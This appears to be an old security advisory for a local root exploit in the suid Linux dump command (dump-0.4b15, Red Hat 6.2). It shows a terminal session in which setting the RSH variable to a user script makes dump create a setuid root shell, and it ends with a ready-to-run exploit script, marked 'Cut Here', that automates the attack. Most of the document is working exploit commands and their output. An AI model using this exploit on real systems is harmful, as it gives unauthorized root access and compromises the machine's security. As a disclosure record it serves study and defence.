1. Problem:
 Linux dump command executes external program with suid priviledge.
2. Tested Version
 dump-0.4b15
3. Example
 [mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
 [mat@localhost mat]$ ls -la /home/mat/sh
 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
 [mat@localhost mat]$ /home/mat/sh
 bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================

---------Cut Here----------
#!/bin/sh

# Redhat 6.2 dump command executes external program 
# with suid priviledge.
# Discovered by Mat <mat@hacksware.com>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <mat@hacksware.com>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
  echo "$DUMP is NOT setuid on this system or does not exist at all!"
  echo
  exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
}
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id